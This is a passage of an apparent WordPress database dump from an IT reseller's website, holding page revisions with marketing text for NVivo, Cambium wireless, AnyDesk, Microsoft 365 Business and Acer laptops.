src=\"https://bintara.com.my/wp-content/uploads/2018/12/Public-health-studies_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Public health studies</h4>\r\nAnalyzing population health to influenceÂ <em>public health</em>policy, practices and education\r\n\r\n<img class=\"alignnone wp-image-1931 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-grant-funding_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research grant funding</h4>\r\nRigorously backing up findings with evidence-based research to increase success of finding\r\n\r\n<img class=\"alignnone wp-image-1932 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Finding-the-best-minds_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Finding the best minds</h4>\r\nAttracting and retaining top staff and students with the most advanced research tools\r\n\r\n[maxbutton id=\"1\" ]','NVivo','','inherit','closed','closed','','1568-revision-v1','','','2018-12-14 09:28:54','2018-12-14 01:28:54','',1568,'https://bintara.com.my/blog/2018/12/14/1568-revision-v1/',0,'revision','',0),(1789,1,'2018-12-12 11:21:22','2018-12-12 03:21:22','Qualitative Data Analysis &amp; Research Software\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1769\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Atlas.ti-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ATLAS.TI','','inherit','closed','closed','','1342-autosave-v1','','','2018-12-12 11:21:22','2018-12-12 03:21:22','',1342,'https://bintara.com.my/blog/2018/12/12/1342-autosave-v1/',0,'revision','',0),(1794,1,'2018-12-12 11:39:18','2018-12-12 03:39:18','<h2>Cambium</h2>\r\n<h3 class=\"section-title h1\">Solutions for all your wireless needs</h3>\r\n<strong>Local Government</strong>\r\n\r\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\r\n\r\n<strong>Higher Education</strong>\r\n\r\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\r\n\r\n<strong>Regional Service Providers</strong>\r\n\r\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\r\n\r\n<strong>Oil and Gas</strong>\r\n\r\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\r\n\r\n<strong>Small Medium Business Retail</strong>\r\n\r\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\r\n\r\n<strong>Managed Service Providers</strong>\r\n\r\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.\r\n\r\n<strong>Federal Government</strong>\r\n\r\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\r\n\r\n<strong>Retail</strong>\r\n\r\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\r\n\r\n<strong>Smart Cities</strong>\r\n\r\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2018-12-12 11:39:18','2018-12-12 03:39:18','',1451,'https://bintara.com.my/blog/2018/12/12/1451-revision-v1/',0,'revision','',0),(1791,1,'2018-12-12 11:27:52','2018-12-12 03:27:52','<h2>Cambium</h2>\r\n<h3 class=\"section-title h1\">Solutions for all your wireless needs</h3>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><strong>Local Government</strong>\r\n\r\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.</td>\r\n<td width=\"200\"><strong>Higher Education</strong>\r\n\r\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.</td>\r\n<td width=\"200\"><strong>Regional Service Providers</strong>\r\n\r\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><strong>Oil and Gas</strong>\r\n\r\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.</td>\r\n<td width=\"200\"><strong>Small Medium Business Retail</strong>\r\n\r\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.</td>\r\n<td width=\"200\"><strong>Managed Service Providers</strong>\r\n\r\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><strong>Federal Government</strong>\r\n\r\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.</td>\r\n<td width=\"200\"><strong>Retail</strong>\r\n\r\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience</td>\r\n<td width=\"200\"><strong>Smart Cities</strong>\r\n\r\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.</td>\r\n</tr>\r\n</tbody>\r\n</table>','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2018-12-12 11:27:52','2018-12-12 03:27:52','',1451,'https://bintara.com.my/blog/2018/12/12/1451-revision-v1/',0,'revision','',0),(2816,1,'2019-01-04 17:00:43','2019-01-04 09:00:43','<h3>Cambium</h3>\r\n<h3>Solutions for all your wireless needs</h3>\r\n<strong>Local Government</strong>\r\n\r\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\r\n\r\n<strong>Higher Education</strong>\r\n\r\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\r\n\r\n<strong>Regional Service Providers</strong>\r\n\r\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\r\n\r\n<strong>Oil and Gas</strong>\r\n\r\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\r\n\r\n<strong>Small Medium Business Retail</strong>\r\n\r\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\r\n\r\n<strong>Managed Service Providers</strong>\r\n\r\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.\r\n\r\n<strong>Federal Government</strong>\r\n\r\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\r\n\r\n<strong>Retail</strong>\r\n\r\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\r\n\r\n<strong>Smart Cities</strong>\r\n\r\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.\r\n\r\n[maxbutton id=\"1\" ]','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2019-01-04 17:00:43','2019-01-04 09:00:43','',1451,'https://bintara.com.my/blog/2019/01/04/1451-revision-v1/',0,'revision','',0),(1795,1,'2018-12-12 11:42:24','2018-12-12 03:42:24','<h2>Cambium</h2>\r\n<h3 class=\"section-title h1\">Solutions for all your wireless needs</h3>\r\n<strong>Local Government</strong>\r\n\r\nConnect events, people, and places with the reliable technology that provides the highest throughput at the lowest total cost. Local governments have deployed wireless connectivity to create city hotspots, monitor facilities, and connect events.\r\n\r\n<strong>Higher Education</strong>\r\n\r\nClassrooms, dormitories, research labs, auditoriums, and stadiums go dark. Every aspect of higher education depends on being connected, and wireless solutions from Cambium Networks provide affordable quality in end-to-end connectivity. Rapidly deploy the network you need at a fraction of the cost of leased lines or fiber build-outs.\r\n\r\n<strong>Regional Service Providers</strong>\r\n\r\nWireless broadband solutions that operate in both the licensed and unlicensed spectrum are proven to connect millions of users around the world, and technology from Cambium Networks is designed to provide the spectral efficiency, coverage, and capacity to offer consistently reliable wireless connectivity to business and residential subscribers.\r\n\r\n<strong>Oil and Gas</strong>\r\n\r\nWireless network connectivity for data transfer, SCADA monitoring and control, and video surveillance at indoor and outdoor locations. Contact us for more information.\r\n\r\n<strong>Small Medium Business Retail</strong>\r\n\r\nConnectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.\r\n\r\n<strong>Managed Service Providers</strong>\r\n\r\ncnPilot Wi-Fi technology with cnMaestro controller management support the MSPs delivery of trouble-free service to customers, reduce the total operating costs and protect their clientsâ€™ bottom lines.\r\n\r\n<strong>Federal Government</strong>\r\n\r\nOur field-proven, agency-vetted solutions provide reliable broadband for video, voice, and data applications.\r\n\r\n<strong>Retail</strong>\r\n\r\nConnectivity is changing the retail experience. Retailers can improve store efficiency while providing customers with the Wi-Fi connectivity that enhances their shopping experience\r\n\r\n<strong>Smart Cities</strong>\r\n\r\nWireless broadband provides high-speed, rapidly deployed connectivity for WiFi, video surveillance, data transfer, and SCADA control.\r\n\r\n[maxbutton id=\"1\" ]','Cambium','','inherit','closed','closed','','1451-revision-v1','','','2018-12-12 11:42:24','2018-12-12 03:42:24','',1451,'https://bintara.com.my/blog/2018/12/12/1451-revision-v1/',0,'revision','',0),(1849,1,'2018-12-12 12:20:47','2018-12-12 04:20:47','Remote Desktop Application. <a href=\"http://bintara.com.my/anydesk\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1813\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AnyDesk-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','ANYDESK','','inherit','closed','closed','','1328-autosave-v1','','','2018-12-12 12:20:47','2018-12-12 04:20:47','',1328,'https://bintara.com.my/blog/2018/12/12/1328-autosave-v1/',0,'revision','',0),(2104,1,'2018-12-13 23:41:23','2018-12-13 15:41:23','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.\n<h3 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-outlook m-pmg-pv-1500\">Microsoft 365 Business</h3>\n<p class=\"no-margin body-alt pmg-pv-1535 pmg-cl-black\">An integrated solution, bringing together the best-in-class productivity of Office 365 with advanced security and device management capabilities to help safeguard your business.</p>\n\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000\">Get more done</h4>\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\n 	<li class=\"body-alt\">Create your best work with intelligent tools built in to Office.</li>\n 	<li class=\"body-alt\">Get work done with enterprise grade email and calendaring.</li>\n 	<li class=\"body-alt\">Access your files from anywhere with online file storage.</li>\n 	<li class=\"body-alt\">Easily integrate with other commonly used apps and solutions.</li>\n</ul>\n&nbsp;\n<h4 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-white pmg-pv-1015\">Work better together</h4>\n<ul class=\"body-alt pmg-cl-white no-margin pmg-pv-0005 pmg-list-style-none pmg-ph-0000 pmg-mv-0015\">\n 	<li class=\"body-alt\">Bring together teams and resources, all in one place.</li>\n 	<li class=\"body-alt\">Connect with customers, coworkers, and suppliers.</li>\n 	<li class=\"body-alt\">Host online meetings to increase collaboration and productivity.</li>\n 	<li class=\"body-alt\">Work anywhere from any device.</li>\n</ul>\n&nbsp;\n<div class=\"m-pmg-mv-3000 xs-pmg-mv-6000\">\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black xs-pmg-mv-1520 m-pmg-mv-1020\">Safeguard your data</h4>\n</div>\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-pv-0010 pmg-list-style-none pmg-ph-0000\">\n 	<li class=\"body-alt\">Help protect against security threats.</li>\n 	<li class=\"body-alt\">Help secure your business data from accidental leaks.</li>\n 	<li class=\"body-alt\">Control who has access to your business information.</li>\n 	<li class=\"body-alt\">Gain peace of mind that you have tools to help you remain compliant.</li>\n</ul>\n&nbsp;\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000 x-hidden-focus\">Simplified for you</h4>\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\n 	<li class=\"body-alt\">Choose solutions that are right for your business.</li>\n 	<li class=\"body-alt\">Get more value for your money.</li>\n 	<li class=\"body-alt\">Give your employees to tools they need.</li>\n 	<li class=\"body-alt x-hidden-focus\">Ensure you have the latest features and security updates.</li>\n</ul>\n<h4 class=\"pmg-ff-segoe-ui-regular header no-margin pmg-pv-0020 pmg-cl-black\">Discover the Microsoft 365 Business advantage</h4>\n<p class=\" no-margin  xs-pmg-pv-0010 m-pmg-pv-0020 pmg-cl-black\">Microsoft 365 Business brings together features from across Microsoftâ€™s offerings in a solution designed for small and medium-sized businesses. Itâ€™s powered by Office 365 and Windows 10, with device management and security features to help ensure your companyâ€™s data is protected.</p>','Microsoft','','inherit','closed','closed','','1551-autosave-v1','','','2018-12-13 23:41:23','2018-12-13 15:41:23','',1551,'https://bintara.com.my/blog/2018/12/13/1551-autosave-v1/',0,'revision','',0),(3098,1,'2019-09-17 17:26:31','2019-09-17 09:26:31','<h3>Business Product Solution</h3>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:26:31','2019-09-17 09:26:31','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(3097,1,'2019-09-17 17:26:01','2019-09-17 09:26:01','<h3>Business Product Solution</h3>\r\n<br><br>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Swift</h4>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong>Swift 7 Pro</strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Spin</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4></h4>\r\n<h4 class=\"fs-4 align-center margin-top-l\">Switch</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nSwitch 12\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate B</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\nTravelMate Spin B1\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-17 17:26:01','2019-09-17 09:26:01','',1430,'https://bintara.com.my/blog/2019/09/17/1430-revision-v1/',0,'revision','',0),(1800,1,'2018-12-12 12:02:00','2018-12-12 04:02:00','','barcode scanner','','inherit','closed','closed','','barcode-scanner','','','2018-12-12 12:02:00','2018-12-12 